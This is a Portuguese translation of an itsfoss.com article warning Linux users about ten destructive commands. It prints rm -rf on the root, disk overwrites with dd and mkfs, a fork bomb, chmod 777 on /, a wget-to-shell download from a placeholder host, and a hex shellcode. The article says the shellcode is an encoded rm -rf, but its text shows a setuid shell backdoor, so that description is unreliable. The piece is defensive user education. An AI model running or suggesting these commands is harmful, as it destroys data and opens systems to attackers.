Quais são os comandos Linux mais perigosos?
Não há uma lista definitiva de comandos perigosos do Linux.
Você tem as ferramentas que permitem controlar e modificar todos os aspectos do seu sistema operacional. Eu não estamos tentando assustá-lo, mas se você não está familiarizado com os comandos e ferramentas, você pode estragar o seu sistema muito facilmente.
Imagine o cenário de uma criança pequena em uma casa. Existem inúmeras maneiras pelas quais a criança pode se machucar. Mas isso significa que a criança não deve ser permitida fora do berço? Isso seria prejudicial para o seu crescimento.
É aqui que os pais estabelecem limites e guiam a criança. Não se aproxime do fogo. Não enfie os dedos nas tomadas. À medida que a criança cresce e ganha experiência, ela pode ligar o fogão, fazer um fogo na lareira e conectar os cabos de energia.
Da mesma forma, se você estiver ciente de alguns comandos arriscados conhecidos, você pode evitar cair nas armadilhas de trolls tentando enganá-lo para executar comandos e bagunçar seu sistema.
À medida que você ganha experiência e conhece o significado e os usos dos comandos e ferramentas, menos serão as chances de destruir seu sistema com comandos bobos e complicados.
Reunimos alguns dos populares comandos perigosos do Linux. Vamos ver como eles funcionam.
1. rm -rf /*
Este é provavelmente o comando mais infame circulando em todos os tipos de mídia social. Muitas vezes você encontrará trolls comentando isso em várias discussões.
O comando rm
é usado para remover arquivos/diretórios. Os sinalizadores -r
e -f
são usados para denotar a remoção recursiva de todos os arquivos dentro do diretório especificado. Agora, sem privilégio de root, esse comando não causará nenhum dano.
A execução do comando sudo rm -rf / também não criará problemas, pois a maioria das distribuições fornece uma opção à prova de falhas. Você precisa especificar --no-preserve-root
com ele para realmente executá-lo.
sudo rm -rf / --no-preserve-root
No entanto, uma versão mais simples disso poderia ser:
sudo rm -rf /*
Ele começará a excluir todos os arquivos recursivamente no diretório raiz e, em algum momento específico, seu sistema congela com uma mensagem "Erro ao excluir arquivo". Uma vez reinicializado, você será enviado para o prompt grub-rescue.
2. Substituindo sua partição
Se você está familiarizado com sistemas de arquivos, provavelmente sabe o que é /dev/sda
. É (geralmente) a partição da unidade de disco. O operador >
é usado para gravar a saída de seu comando anterior no local especificado fornecido.
Depois de executar qualquer comando e gravá-lo em /dev/sda, diga:
echo "Hello" > /dev/sda
Isso substituirá sua partição contendo todos os dados necessários para inicializar o sistema com a cadeia de caracteres "Hello".
3. Movendo tudo para o null
Há um null (vazio) dentro de cada sistema Linux. E esse vazio é /dev/null
.
Tudo o que você joga nesta área está perdido para sempre. Além disso, relata o processo de escrita como um sucesso após o descarte dos dados, que é a principal razão para sua destrutividade.
mv /home/user/* /dev/null
O comando mv
usado para mover ou renomear arquivos/diretórios. No comando acima, você move todos os arquivos dentro do diretório base para o void. Enquanto o sistema raiz não for destruído, todos os seus dados pessoais serão perdidos.
4. Formatando seu disco rígido
mkfs
é um utilitário de linha de comando, usado para formatar discos e partições. É uma ferramenta super útil para criar partições para várias instalações. Mas o mesmo comando pode formatar sua unidade também. Formatar sua unidade significa excluir todos os arquivos necessários para o sistema inicializar.
mkfs.ext3 /dev/sda
O comando faz o seu trabalho e você acaba com um sistema bagunçado além da recuperação.
5. Bomba de fork
Essa combinação aleatória e fofa de caracteres e símbolos especiais é poderosa o suficiente para congelar um sistema em execução, esgotando os recursos do sistema.
:(){:|:&};:
& – Operador de fundo do Shell. Ele informa o shell para colocar o comando em segundo plano. Aqui, ele define uma função chamada ':', que se chama duas vezes, uma vez em primeiro plano e outra em segundo plano. Este processo continua a ser executado de novo e de novo até que o sistema congele.
Como o nome sugere, a bomba de fork se bifurca e, eventualmente, se torna uma bomba em loop e consome todos os recursos do sistema. Você será forçado a reiniciar o sistema, o que não é tão ruim quanto os outros comandos nesta lista.
6. Substituindo arquivos de configuração importantes
Embora isso não seja um comando por si só, é mais uma coisa de precaução.
Como mencionado acima, o operador >
é usado para gravar em um arquivo. Ele apenas descarta qualquer coisa já presente no arquivo e grava novos dados fornecidos a ele.
command > arquivo_de_configuracao
Agora, se você usar algum arquivo de configuração importante como o local para gravar dados, ele substituirá o conteúdo, deixando um sistema quebrado.
7. Substituindo a partição por dados de lixo
O /dev/random
é um comando no Linux que pode criar dados de lixo. Combine-o com o comando dd
e sua partição, e você terá um Molotov para incendiar sua partição.
O comando dd
é usado como uma ferramenta de cópia de baixo nível. Aqui, ele pega dados aleatórios de /dev/random
e substitui a partição /dev/sda
por esse lixo.
dd if=/dev/random of=/dev/sda
Um tipo semelhante de efeito é obtido com:
cat /dev/urandom > filename
Aqui, ele pega dados de lixo de /dev/urandom
e preenche um arquivo. Se não for terminado com Ctrl
+ C
, o arquivo pode ocupar uma quantidade considerável de espaço, o que pode ser desastroso para sistemas low-end.
8. Expondo seu sistema a todos
Tudo é um arquivo no Linux e cada arquivo tem certas permissões.
Você pode exibir as permissões com ls -l
. O sistema de arquivos raiz não é acessível a outros usuários sem privilégios. Embora isso garanta um sistema privado e seguro, você pode inverter esse sistema com um único comando.
chmod -R 777 /
O comando acima expõe todos os arquivos na partição root para todos. O que isso significa é que todos que usam o sistema têm permissão de leitura, gravação e execução. Isso não é bom para o seu sistema.
9. Baixando e executando conteúdo malicioso
Como você instala software no Linux? Você usa o gerenciador de pacotes oficial ou pacotes prontos para usar como Deb/RPM, Snap. Flatpak etc.
No entanto, alguns softwares não são empacotados e seus desenvolvedores fornecem scripts de shell para baixar e executar. Tome homebrew por exemplo.
Você baixa um arquivo shell e o executa como root para instalar um software em seu sistema. Você vê o problema com isso?
Embora funcione com software oficial como o Homebrew, você deve verificar novamente o conteúdo do shell script que está baixando antes de executá-lo diretamente assim:
wget http://malicious_source -O- | sh
Tais comandos baixarão e executarão scripts maliciosos em seu sistema, o que pode prejudicar a segurança do seu sistema.
10. Comandos disfarçados
Há muitas maneiras de executar comandos em um terminal Linux. Uma dessas maneiras são os comandos codificados em hex.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Embora pareça extravagante, esta é uma versão codificada do comando rm -rf
. Ele faz o mesmo efeito que a execução do comando anterior. Então, ao copiar e colar esses comandos extravagantes da internet, seja cauteloso.
Conclusão
Existe um famoso termo de computação PEBKAC; "existe um problema entre o teclado e a cadeira."
Porque, no final, cabe ao usuário (você) garantir que você não destrua o sistema executando cegamente qualquer comando perigoso.
Não é função do UNIX impedi-lo de dar um tiro no pé. Se você optar por fazê-lo, então é função do UNIX entregar o Sr. Bala ao Sr. Pé da maneira mais eficiente que ele conhece.
E essa linha se aplica igualmente ao Linux. Você obtém controle total sobre seu sistema operacional. O que você escolhe fazer com você depende totalmente.
Aconselhamos estas coisas para garantir uma experiência mais segura:
- Tente entender os comandos que você está prestes a executar.
- Mantenha um backup das configurações do seu sistema com Timeshift
- Mantenha um backup de dados pessoais (diretório home) usando DejaDup
Como dito, não há uma lista fixa de comandos perigosos do Linux. Muito mais pode ser adicionado a esta lista e simplesmente não há fim para isso.
Seria muito bom conhecer pelo menos os comandos básicos do Linux e seu funcionamento também ajuda a evitar erros bobos, mas catastróficos.
Esperamos que isso lhe dê algumas dicas sobre o que você não deve fazer para se manter seguro com o Linux. Deixe-nos saber se você tem sugestões na seção de comentários.
Via itsfoss.com. Você pode conferir o post original em inglês:
10 Destructive Linux Commands You Should Never RunÚltima atualização deste artigo: 17 de april de 2023